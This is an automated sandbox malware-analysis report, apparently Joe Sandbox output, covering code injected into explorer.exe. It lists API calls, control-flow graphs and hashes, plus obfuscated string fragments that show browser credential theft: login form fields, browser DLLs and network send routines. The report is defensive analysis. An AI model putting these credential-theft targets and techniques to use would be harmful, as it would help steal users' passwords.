                  control_flow_graph 232 b30ab66-b30ab68 233 b30ab93-b30abb8 232->233 234 b30ab6a-b30ab71 232->234 235 b30abbb-b30ac22 call b311612 call b313942 * 2 233->235 234->235 238 b30ab73-b30ab92 234->238 244 b30ac28-b30ac2b 235->244 245 b30acdc 235->245 238->233 244->245 247 b30ac31-b30acd3 call b315da4 call b315022 call b3153e2 call b315022 call b3153e2 CreateMutexW 244->247 246 b30acde-b30acf6 245->246 247->245 261 b30acd5-b30acda 247->261 261->246
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2539715422.000000000B230000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B230000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_b230000_explorer.jbxd
                  Similarity
                  • API ID: CreateMutex
                  • String ID: .dll$el32$kern
                  • API String ID: 1964310414-1222553051
                  • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                  • Instruction ID: 11dd12698c3ea9c88a1a445c17174be0277388d37722e1d3e00d50c99c8ef93d
                  • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                  • Instruction Fuzzy Hash: 00418D70928A088FCB48EFA8C4D57AD77E0FFA8300F10067AC84ADB255DE309945CB85

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2539715422.000000000B230000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B230000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_b230000_explorer.jbxd
                  Similarity
                  • API ID: CreateMutex
                  • String ID: .dll$el32$kern
                  • API String ID: 1964310414-1222553051
                  • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                  • Instruction ID: af2837c23c13c10350e09dba69429d7c1f424753630f5a599948eea8859ac761
                  • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                  • Instruction Fuzzy Hash: D5415A70918A088FDB88EFA8C4997AD77E4FFA8300F15456AC84ADB255DE309945CB85

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 397 b31072e-b310768 398 b310788-b3107ab connect 397->398 399 b31076a-b310782 call b313942 397->399 399->398
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2539715422.000000000B230000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B230000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_b230000_explorer.jbxd
                  Similarity
                  • API ID: connect
                  • String ID: conn$ect
                  • API String ID: 1959786783-716201944
                  • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                  • Instruction ID: cb716414ca046505e5ccd4ea20534d12d30287d91e3686c2238d1073d2bcbeb6
                  • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                  • Instruction Fuzzy Hash: 6E015E30618B188FCB88EF1CE088B55B7E0FB58314F1545AED90DCB226C674C8818BC2

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 402 b310732-b310768 403 b310788-b3107ab connect 402->403 404 b31076a-b310782 call b313942 402->404 404->403
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2539715422.000000000B230000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B230000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_b230000_explorer.jbxd
                  Similarity
                  • API ID: connect
                  • String ID: conn$ect
                  • API String ID: 1959786783-716201944
                  • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                  • Instruction ID: d0dd32ac406f8d20a3a453bb33d993f41f844924759ba9d38b4c7ebdd3dd17b6
                  • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                  • Instruction Fuzzy Hash: 38012C70618A1C8FCBC8EF5CE088B55B7E0FB59314F1545AEE80DCB226CA74C9818BC2

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 407 b3106b2-b3106e5 408 b310705-b31072d send 407->408 409 b3106e7-b3106ff call b313942 407->409 409->408
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2539715422.000000000B230000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B230000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_b230000_explorer.jbxd
                  Similarity
                  • API ID: send
                  • String ID: send
                  • API String ID: 2809346765-2809346765
                  • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                  • Instruction ID: c3958d0773b6ab38abb287ff1edcb343fa904cd07ae057347e766f8ebcb1d3d0
                  • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                  • Instruction Fuzzy Hash: 6E012570518A1C8FDBC8EF1CD049B2577E0FB58314F1546AED85DCB266C670D881CB85

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 412 b3105b2-b3105ea 413 b31060a-b31062b socket 412->413 414 b3105ec-b310604 call b313942 412->414 414->413
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2539715422.000000000B230000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B230000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_b230000_explorer.jbxd
                  Similarity
                  • API ID: socket
                  • String ID: sock
                  • API String ID: 98920635-2415254727
                  • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                  • Instruction ID: 24d987974bc0aac3bcac92acbb2935c1ba28017fc18ebc4a4f2020841f543a86
                  • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                  • Instruction Fuzzy Hash: 8701447061861C8FCB88EF1CD048B54BBE4FB59314F1545ADD45ECB266C7B0C981CB86

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 417 b3082dd-b308320 call b313942 420 b308326 417->420 421 b3083fa-b30840e 417->421 422 b308328-b308339 SleepEx 420->422 422->422 423 b30833b-b308341 422->423 424 b308343-b308349 423->424 425 b30834b-b308352 423->425 424->425 426 b30835c-b30836a call b312f12 424->426 427 b308370-b308376 425->427 428 b308354-b30835a 425->428 426->427 430 b3083b7-b3083bd 427->430 431 b308378-b30837e 427->431 428->426 428->427 434 b3083d4-b3083db 430->434 435 b3083bf-b3083cf call b308e72 430->435 431->430 433 b308380-b30838a 431->433 433->430 436 b30838c-b3083b1 call b309432 433->436 434->422 438 b3083e1-b3083f5 call b3080f2 434->438 435->434 436->430 438->422
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.2539715422.000000000B230000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B230000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_b230000_explorer.jbxd
                  Similarity
                  • API ID: Sleep
                  • String ID:
                  • API String ID: 3472027048-0
                  • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                  • Instruction ID: 7ea859ac202b176a7f29ca1edebf22bbce5ea755420e1fd9856336419db03bfc
                  • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                  • Instruction Fuzzy Hash: 17315EB8524B0ADFDB68EF6980582A5F7A1FF94300F6446BEC92DCA146CB749050CFD1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 453 b308412-b308446 call b313942 456 b308473-b30847d 453->456 457 b308448-b308472 call b315c9e CreateThread 453->457
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.2539715422.000000000B230000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B230000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_b230000_explorer.jbxd
                  Similarity
                  • API ID: CreateThread
                  • String ID:
                  • API String ID: 2422867632-0
                  • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                  • Instruction ID: ca034b83e99aa6205ed1d23f4960d2ed7b30c8c7eae4ba90b1c82f12fa22a199
                  • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                  • Instruction Fuzzy Hash: E6F0F630268A484FD788EF2CD44563AF3D4FBE8214F450A3EE58DC3264DE39C5814716
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                  • API String ID: 0-393284711
                  • Opcode ID: 820e0c63575a5d445978754887b7e69ae643408baa0ea5598943f3095bfb9b56
                  • Instruction ID: e24df1687836ab1d79afa40713fa3d95f531d10ac5106d62f9bff47dc7443933
                  • Opcode Fuzzy Hash: 820e0c63575a5d445978754887b7e69ae643408baa0ea5598943f3095bfb9b56
                  • Instruction Fuzzy Hash: 45E16C70518F488FCB64EF68C4947AAB7E0FB58700F409A2EA69FC7251DF34A545CB89
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537580604.0000000009260000.00000040.00000001.00040000.00000000.sdmp, Offset: 09260000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9260000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                  • API String ID: 0-393284711
                  • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                  • Instruction ID: 9c226288bf396e62f33a7a43dee4c197b293fc9104a5ed9ca59c82b8ed9106a7
                  • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                  • Instruction Fuzzy Hash: 06E15BB4618F488FC768EF68C484BAAB7E1FB58300F509A2E959FC7255DF30A541CB85
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                  • API String ID: 0-2916316912
                  • Opcode ID: 1a0a5e1d0c6cdda34712c7dd13aea583182670e392796a479699e5699cca8bdd
                  • Instruction ID: 41203db0a113e67aed5c0fd1e902e4bfd2d7a8a66b47cbe63c900ba5c666d7ae
                  • Opcode Fuzzy Hash: 1a0a5e1d0c6cdda34712c7dd13aea583182670e392796a479699e5699cca8bdd
                  • Instruction Fuzzy Hash: 05B1AD30518B488EDB54EFA8C499AEEB7F1FF98700F40851EE59AC7261EF309405CB86
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                  • API String ID: 0-1539916866
                  • Opcode ID: 59df3088bc8ad2cd3c7dbe4284f58b49f6d81995bd35e5f8e1f1ca20f6f3330d
                  • Instruction ID: 1e0392340651d0868bc58adad162164df545af766ee43c3efb75e8271cd1a1cf
                  • Opcode Fuzzy Hash: 59df3088bc8ad2cd3c7dbe4284f58b49f6d81995bd35e5f8e1f1ca20f6f3330d
                  • Instruction Fuzzy Hash: 4241B070A18B088FDB18DF88A8557AD7BF6FB48B00F00425EE909D3245DBB59D458BD6
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                  • API String ID: 0-355182820
                  • Opcode ID: 4c5f900ff63b5ab5d99ed12fde2b81ee28df9f49491057f0c7293800f375c84d
                  • Instruction ID: 18387416227516b4124fa4ae454500fc4bfe4c32c517b5ecd6a436a048a17fa2
                  • Opcode Fuzzy Hash: 4c5f900ff63b5ab5d99ed12fde2b81ee28df9f49491057f0c7293800f375c84d
                  • Instruction Fuzzy Hash: A6C16970218B098FC758EF68C4A5BEAF3E5FB94704F50962EA59EC7210DF30A515CB86
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                  • API String ID: 0-97273177
                  • Opcode ID: 0fb697a17e0d8f7f76cdd04d6ff717ca94a967cb3f33b38bada886c39e976de4
                  • Instruction ID: 132576aae87d5f82cbf9a6e982690583b232afc0a2f8e00f081edb200742a7ea
                  • Opcode Fuzzy Hash: 0fb697a17e0d8f7f76cdd04d6ff717ca94a967cb3f33b38bada886c39e976de4
                  • Instruction Fuzzy Hash: 1B51D0312187488FD719DF58D8912EAB7E5FB85700F505A2EF98FC7211DBB49906CB82
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537580604.0000000009260000.00000040.00000001.00040000.00000000.sdmp, Offset: 09260000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9260000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                  • API String ID: 0-97273177
                  • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                  • Instruction ID: f86681c773bbbc36414b4fee64e1554924dbc0fee04cb140fa61f8415a4fa3d0
                  • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                  • Instruction Fuzzy Hash: 9851D3312187488FD719DF18C8857AAB7E5FB89300F505A2EE8CBC7252DBB49546CF82
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                  • API String ID: 0-639201278
                  • Opcode ID: c13b2041994f1245db958037aaba7e6f32ff68e10f695ce4a6fa49094af5b4e1
                  • Instruction ID: 23d82c7d48f1b359197ff24cbfae4be956de00eca3c5d8a3d6f312bf98f20bc8
                  • Opcode Fuzzy Hash: c13b2041994f1245db958037aaba7e6f32ff68e10f695ce4a6fa49094af5b4e1
                  • Instruction Fuzzy Hash: F9C1AF70618E194FCB58EFA8C4A5BEAB3E5FB98700F519329A54EC7250DF30A90687C5
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                  • API String ID: 0-639201278
                  • Opcode ID: 676b2bdcdb0f7617010c07a7aafeebbbb04f58bb06a35d76d684fdee6b2e69b3
                  • Instruction ID: 19c850c000bd7a65edabcadec5a74ad594afc311f25d00fe174bdb3fda019b86
                  • Opcode Fuzzy Hash: 676b2bdcdb0f7617010c07a7aafeebbbb04f58bb06a35d76d684fdee6b2e69b3
                  • Instruction Fuzzy Hash: 97C1AF70618E194FCB58EFA8C4A5BAAF3E5FB98700F519329A54EC7250DF309906CBC5
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: UR$2$L: $Pass$User$name$word
                  • API String ID: 0-2058692283
                  • Opcode ID: 5ea768e64b9f81e2a7b60b9d765a87131b23e9251f7e26c56cbfd838d664c8da
                  • Instruction ID: f2077060572f4e998e0206cb6519655fa041a15bb1fea368b2c687d052a1eae1
                  • Opcode Fuzzy Hash: 5ea768e64b9f81e2a7b60b9d765a87131b23e9251f7e26c56cbfd838d664c8da
                  • Instruction Fuzzy Hash: 8FA1BE7061874C8FDB28EFA894547EEB7F1FB88710F00962DE58AD7251EB3485468789
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: UR$2$L: $Pass$User$name$word
                  • API String ID: 0-2058692283
                  • Opcode ID: 540520bbaa8e49ba126174a607229c7b6500cd68c4cb9f9c6f1ce640339d49f6
                  • Instruction ID: 91f4895ee2e748c0d31625ae4705d4c2d8ea0f10d87aa0854f64a7a8ecceac14
                  • Opcode Fuzzy Hash: 540520bbaa8e49ba126174a607229c7b6500cd68c4cb9f9c6f1ce640339d49f6
                  • Instruction Fuzzy Hash: 2691BF30A1874C8FDB28EFA8D454BEEB7F1FB88710F00962DE58AD7251EB7485468785
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: $.$e$n$v
                  • API String ID: 0-1849617553
                  • Opcode ID: a524435d54208a0e832b47c0ea56ad9292d259260bd6d8380e3a1fe551b8dcf6
                  • Instruction ID: d283c84144e94568e2682d06f73d96b5979e37e2617c65696915ff7f89101598
                  • Opcode Fuzzy Hash: a524435d54208a0e832b47c0ea56ad9292d259260bd6d8380e3a1fe551b8dcf6
                  • Instruction Fuzzy Hash: 9F71C331618B4D8FD758EFA8C4987AAB7F1FF58304F00462EE54AC7261EB71D9458B81
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537580604.0000000009260000.00000040.00000001.00040000.00000000.sdmp, Offset: 09260000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9260000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: $.$e$n$v
                  • API String ID: 0-1849617553
                  • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                  • Instruction ID: a985dafd3d5145fb7192514ef7d78a3bfb21976cfdcb88871c602aa4e5f925ac
                  • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                  • Instruction Fuzzy Hash: F0718331618B498FD758EFA8C4887AAB7F1FF58304F00462EE45AC7261EF71E9458B81
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: 2.dl$dll$l32.$ole3$shel
                  • API String ID: 0-1970020201
                  • Opcode ID: 950746cb5e27917ece0116f54d48afc4b4da6e6bc5a5bdb2b4385cf229eb2f13
                  • Instruction ID: d832a047416019cfc60bb344e6fc07afab9c0f0f47557fffbd5047f3a35ffc3b
                  • Opcode Fuzzy Hash: 950746cb5e27917ece0116f54d48afc4b4da6e6bc5a5bdb2b4385cf229eb2f13
                  • Instruction Fuzzy Hash: 2D514DB0914B4C8FDB64EFA4C0547EAB7F1FF58300F40562EA99AE7214EF3095418B99
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4$\$dll$ion.$vers
                  • API String ID: 0-1610437797
                  • Opcode ID: 6c012d55a84896953cf4ee309d22ae9a4f0d711c0c26d40fc9bff931502fc0f3
                  • Instruction ID: b8a647237bf5c4becd48b9b24483d564e8a262932c10705941e230ad1504288b
                  • Opcode Fuzzy Hash: 6c012d55a84896953cf4ee309d22ae9a4f0d711c0c26d40fc9bff931502fc0f3
                  • Instruction Fuzzy Hash: 36416230218B4C8FCBB5EF6498557EAB3E4FB98701F40462EA98EC7241EF30D5458782
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: 32.d$cli.$dll$sspi$user
                  • API String ID: 0-327345718
                  • Opcode ID: 673bcfbb06bbf12ecae13d7971ffb9826fb3a60c12b699fbe9fdcb62795756db
                  • Instruction ID: d81868bed899029a6e048f8060d77f6628c4465b138b75d160330c572eb52a4a
                  • Opcode Fuzzy Hash: 673bcfbb06bbf12ecae13d7971ffb9826fb3a60c12b699fbe9fdcb62795756db
                  • Instruction Fuzzy Hash: E6413B30A18E0D8FCB98EFA880B57AD77E5FB58B00F40456ABD0ED7250DA75D5818BC6
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: .dll$el32$h$kern
                  • API String ID: 0-4264704552
                  • Opcode ID: 403b78b0d2d36ca3d008746fea6b5f708b88a4caa8bfe8aa2399d56780a2fbab
                  • Instruction ID: 9ff26c60afb138df4320b189a548410e38a5f74b952c269d1f1f0cc74eb3eeb2
                  • Opcode Fuzzy Hash: 403b78b0d2d36ca3d008746fea6b5f708b88a4caa8bfe8aa2399d56780a2fbab
                  • Instruction Fuzzy Hash: E8418370608B4C8FD7A9DF6880943AAB7E1FB98700F104A2FA59EC3256DF70D545CB81
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: $Snif$f fr$om:
                  • API String ID: 0-3434893486
                  • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                  • Instruction ID: 904a4e29f00703e6f402b17f0b2e531aaf53c60da64215e24e76202ff1cc4d15
                  • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                  • Instruction Fuzzy Hash: 8A31DE71508B886FD71AEBA8C0947DAB7E4FB94700F50891EE59BC7251EA30A54ACB43
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: $Snif$f fr$om:
                  • API String ID: 0-3434893486
                  • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                  • Instruction ID: aacf4bf00ddc41d0322872ece80a54263be1162ac62345cd4753ee8569da8c05
                  • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                  • Instruction Fuzzy Hash: B631C071508B486FD71AEFA8C4946EAB7E4FB94700F50891EF59BC7251EE30A50ACA43
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: .dll$chro$hild$me_c
                  • API String ID: 0-3136806129
                  • Opcode ID: 4d07c1d5550216262635066c0f161cb3f1c2461eb36f9f7503f013580f1143af
                  • Instruction ID: a01052b2534586ea48261e95406cb83dee8af446900849b261e223f39feeef92
                  • Opcode Fuzzy Hash: 4d07c1d5550216262635066c0f161cb3f1c2461eb36f9f7503f013580f1143af
                  • Instruction Fuzzy Hash: 3E318031118B084FCB94EFA885A4BAAB7E1FFD8700F94966DA54ECB214DF30C505C792
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: .dll$chro$hild$me_c
                  • API String ID: 0-3136806129
                  • Opcode ID: 55b59ee5aff409bf7a54e9581448e4d945efcceb6b052ec0c315f0b9349371ea
                  • Instruction ID: 65e6f7b4652fb167d773f67f1deaa5267755724044d17f6091efb751a6f22b2a
                  • Opcode Fuzzy Hash: 55b59ee5aff409bf7a54e9581448e4d945efcceb6b052ec0c315f0b9349371ea
                  • Instruction Fuzzy Hash: A4319031118B084FCB94EFA885A4BAAB7E1FFD8700F94962DA54ECB254DF30C505C792
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                  • API String ID: 0-319646191
                  • Opcode ID: fbe7364b30660737faf2f0174f7db890a032b026078edd966cc1c68d61ef2561
                  • Instruction ID: 52729468e6dc5493371bf577548749b58e3d81ec3b4e33b380415d3373583262
                  • Opcode Fuzzy Hash: fbe7364b30660737faf2f0174f7db890a032b026078edd966cc1c68d61ef2561
                  • Instruction Fuzzy Hash: C531DF31A14A0D8BCF44EFA8C8947EEBBF1FB58614F40522AE54ED7240DF788645C799
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                  • API String ID: 0-319646191
                  • Opcode ID: 074aebb4b67160434595199b4a57563e289a30a0a81708d50db416c8ec7544d3
                  • Instruction ID: e07c0ad7e2cbb58b099212a21f9cd7a7c16c59fe9122111fae0255fe2265ee57
                  • Opcode Fuzzy Hash: 074aebb4b67160434595199b4a57563e289a30a0a81708d50db416c8ec7544d3
                  • Instruction Fuzzy Hash: 2E21E131A10A0C8BCF04EFA9C8947EDBBF1FF58614F40922AF55AD7240DF7486058789
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: .$l$l$t
                  • API String ID: 0-168566397
                  • Opcode ID: 1d7c306c1e1341a45a62cf31c8085ed8d8039098ab6badfe3293c7368b3da5f2
                  • Instruction ID: 8702585c239e6985c21c0f186183ca8269cc638b0c9bf144739bfc75d79adfdb
                  • Opcode Fuzzy Hash: 1d7c306c1e1341a45a62cf31c8085ed8d8039098ab6badfe3293c7368b3da5f2
                  • Instruction Fuzzy Hash: A2218B70A24A0D9FDB08EFA8C0547EEBBF0FB18314F50962EE149D3A00DB7895518B84
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2537951167.0000000009A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 09A60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_9a60000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: .$l$l$t
                  • API String ID: 0-168566397
